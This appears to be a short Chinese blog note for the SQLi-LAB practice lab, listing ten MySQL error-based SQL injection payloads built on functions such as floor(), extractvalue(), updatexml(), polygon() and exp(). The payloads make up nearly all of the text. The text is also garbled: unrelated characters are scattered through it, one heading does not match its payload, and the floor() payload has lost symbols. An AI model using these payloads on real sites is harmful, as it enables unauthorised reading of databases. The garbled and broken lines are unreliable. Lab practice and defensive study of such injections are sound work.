靶場(chǎng)使用SQLi-LAB Lesson1:
網(wǎng)上看了一些文章确镊,大多數(shù)報(bào)錯(cuò)函數(shù)都是floor() extractvalue() updatexml() exp(),但是在mysql中還有很多其他的報(bào)錯(cuò)函數(shù)
1臂容、floor()
payload:id=-1'+and+(select 1 from (select count(),concat(user(),floor(rand()2))x from information_schema.tables group by x limit 0,1)a)%23
2科雳、extractvalue()
使用sqli-lab第二關(guān)
payload:id=1+and+(extractvalue(1,concat(0x5c,(select user()))))%23
3、updatexml
payload:id=1+and+(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))%23
4脓杉、GeometryCollection()
payload:id=1+and+GeometryCollection((select * from(select *from(select user())a)b))%23
5糟秘、polygon()
payload:id=1+and+polygon((select * from(select * from(select user())a)b))%23
6、multipoint()
payload:id=1+and+multipoint((select * from(select * from (select user())a)b))%23
7球散、multilinestring()
payload:id=1+and+multilinestring((select * from(select * from (select user())a)b))%23
8尿赚、linestring()
payload:id=1+and+multipolygon((select * from (select * from (select user())a)b))%23
9、linestring()
payload:id=1+and+linestring((select * from (select * from (select user())a)b))%23
10蕉堰、exp()
payload:id=1+and+exp(~(select * from (select user())a))%23